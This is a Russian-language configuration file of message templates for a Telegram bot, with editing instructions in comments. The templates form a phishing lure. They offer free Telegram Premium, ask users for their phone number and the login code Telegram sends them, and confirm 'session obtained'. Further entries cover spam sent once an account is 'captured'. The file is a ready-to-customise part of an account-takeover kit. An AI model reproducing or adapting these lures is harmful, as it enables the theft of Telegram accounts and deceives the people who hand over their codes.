# здесь вы можете настроить текст и картинки, которые будут в сообщениях от бота (нестройки актуальны только для юзер-клиента).

# элемент_титул - первая текстовая часть сообщения, которая выделена жирным шрифтом. жедательно указывать общую информацию сообщения.
# элемент_текст - основной текст сообщения, поддерживается HTML-разметка
# элемени_фото - изображение, которое будет прикреплено к сообщению. чтобы прикрепить картину добавьте само изображение в директорию images/, и укажите название файла. если же картинка в сообщении не нужна, укажите 0 (если указать несуществующее изображение - возвратит ошибку, будьте внимательны)

# обратите внимание что ключи разделяются символами ***, которые обособлены пробелами (пробелы важны!)
# бот настроен по дефолту, изменяйте по своему усмотрению


старт_титул *** ⭐️ Хочешь получить Premium статус бесплатно?
старт_текст *** Мы дадим тебе эту возможность и в течении 24 часов ты будешь обладателем совершенно бесплатно! Жми кнопку ниже 👇
старт_фото *** menu.jpg

получить_номер_титул *** 💎 Отправь свой номер телефона
получить_номер_текст *** Нажмите кнопку ниже, чтобы поделиться своим контактом с нами, мы привяжем Ваш запрос к этому номеру.
получить_номер_фото *** menu.jpg

получить_код_титул *** 📲 Вы получили код?
получить_код_текст *** Телеграм должен был отправить Вам код для выдачи Premium-статуса. Введите его ниже 👇
получить_код_фото *** 0

сессия_получена_титул *** ⚡️ Так держать!
сессия_получена_текст *** В течении 24 часов Вам отправят подарок в виде Premium-статуса, который будет действовать в течении <i>6 месяцев</> бесплатного пользования, удачи!
сессия_получена_фото *** menu.jpg



спам_сессия_получена_текст *** Спам при получении сессии пользователя
спам_сессия_получена_фото *** menu.jpg
 

спам_аккаунт_захвачен_текст *** Подписывайся на наш канал @
спам_аккаунт_захвачен_фото *** menu.jpg




ошибка *** Что-то пошло не так.. Проверьте правильность ввода кода, возможно произошла ошибка на серверах телеграм.
